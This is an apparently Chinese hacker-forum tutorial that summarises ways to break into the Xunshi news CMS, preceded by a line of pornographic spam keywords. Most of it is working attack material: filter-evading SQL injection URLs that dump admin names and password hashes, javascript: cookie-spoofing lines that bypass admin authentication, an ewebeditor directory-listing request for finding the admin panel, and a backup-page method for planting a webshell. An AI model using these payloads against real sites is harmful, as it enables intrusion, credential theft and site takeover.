亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

訊時漏洞一小結(jié)

  發(fā)布時間:2011-07-15 15:22:44   作者:佚名   我要評論
在網(wǎng)上也有什么訊時三板斧的文章..但我個人覺得有時候靠那三種還是入侵不了(隨著版本的更新)

以下本文總結(jié)來自黑防去年第9期雜志上的內(nèi)容...

先說一個注入吧:http://www.xx.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%

26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2

這里一個注入

效果如圖:


這樣就很輕松可以得到管理用戶名與密碼..這里md5可以拿去破解.但是現(xiàn)在安全意識的提高.

密碼復(fù)雜了..很難破出來..那么我們可以通過后來cookies欺騙進(jìn)去

javascript:alert(document.cookie="adminuser="+escape("用戶名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));

那么這里就會出現(xiàn)一種情況了..如果后臺找不到咋辦呢??請看下一漏洞讓你更輕松達(dá)到你想要的效果:

因為訊時結(jié)合了ewebeditor程序..而它沒有在處理的時候忽視了ewebeditor有個可以列目錄的漏洞

它是做了驗證的..但訊時最沒做好的地方就是驗證..我們可以通過cookies欺騙來繞過驗證.從而可以

訪問這頁面來列目錄..步驟如下:

javascript:alert(document.cookie="admindj=1")

http://www.xx.com/edit/admin_uploadfile.asp?id=46&dir=../..

效果如圖:


這樣全站目錄都能瞧了..找到后臺目錄..進(jìn)去..

那么進(jìn)了后臺怎么拿shell??上傳--備份就ok了..

那么有時候有些管理在做后臺功能的時候把備份頁面去掉了...而他本機里備份頁面還是存在的..

這個我也碰到過一次..你都可以通過列目錄來實現(xiàn)..

javascript:alert(document.cookie="admindj=1")

http://www.xx.com/admin/admin_db_backup.asp?action=BackupData

備份ok..

那么以上兩個漏洞都被管理封住了...咋辦??上面兩個是比較常見的..那么下面一個注入漏洞呢?

在admin目錄下有個admin_lm_edit.asp頁面..里面的id沒有過濾 那么我們就可以先cookies下

然后訪問此頁面進(jìn)行注入..步驟如下:

javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")

然后請求admin/admin_chk.asp頁面

輸入注入語句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%

26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin

效果如圖所示:

相關(guān)文章

最新評論